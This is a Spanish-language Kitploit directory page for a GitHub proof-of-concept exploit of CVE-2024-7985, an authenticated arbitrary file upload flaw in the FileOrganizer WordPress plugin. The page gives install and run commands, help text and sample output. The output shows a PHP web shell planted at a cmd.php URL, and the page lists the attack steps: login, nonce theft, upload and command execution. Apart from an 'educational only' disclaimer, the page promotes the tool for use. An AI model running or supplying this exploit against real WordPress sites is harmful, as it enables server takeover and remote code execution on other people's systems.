Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nxploited/cve-2024-7985-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+)

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+)

Exploit de FileOrganizer - CVE-2024-7985

📌 Resumen

CVE-2024-7985 - El plugin FileOrganizer <= 1.0.9 de WordPress es vulnerable a subidas arbitrarias de archivos autenticadas, permitiendo a atacantes con privilegios de Suscriptor+ subir y ejecutar archivos maliciosos de forma remota. Esta vulnerabilidad surge de la falta de validación del tipo de archivo en la función fileorganizer_ajax_handler, haciendo posible la ejecución remota de código (RCE).

🚨 ¡Este exploit permite a los atacantes ejecutar comandos arbitrarios en el servidor! 🚨

⚡ Características

  • ✅ Automatiza el ataque - Inicio de sesión, obtención de nonce, explotación.
  • ✅ Bypass de controles de seguridad mediante el uso de privilegios de usuario autenticado.
  • ✅ Detección automática de versión - Asegura que el objetivo sea vulnerable.
  • ✅ Ejecución de comandos personalizados - El usuario puede especificar cualquier comando.
  • ✅ Manejo fluido de problemas de verificación SSL.

🛠️ Requisitos

  • Python 3
  • requests
  • beautifulsoup4

Instalar dependencias:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Uso

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 Ayuda de uso

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+) por | Nxploit Khaled_alenazi

options:
  -h, --help           muestra este mensaje de ayuda y sale
  --url URL            URL del sitio WordPress objetivo
  --username USERNAME  Nombre de usuario de WordPress
  --password PASSWORD  Contraseña de WordPress
  --cmd CMD            Comando a ejecutar en el archivo subido

Ejemplo de salida:

root@kitploit:~
[+] Versión vulnerable detectada: 1.0.9
[+] ¡Inicio de sesión exitoso!
[+] Nonce extraído: 7b4a95872b
[+] ¡Archivo subido exitosamente!
[+] Acceda al archivo en: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 Flujo de explotación

1️⃣ Verificación de versión - Determina si el sitio es vulnerable.
2️⃣ Autenticación - Inicia sesión en WordPress.
3️⃣ Extracción de nonce - Obtiene el token de seguridad.
4️⃣ Subida de archivo - Sube un script PHP malicioso.
5️⃣ Ejecución de comandos - Ejecuta los comandos especificados por el usuario.


📌 Aviso legal

Este script es solo con fines educativos; el autor no asume ninguna responsabilidad por su uso indebido o consecuencias. 🚨

Descargar herramienta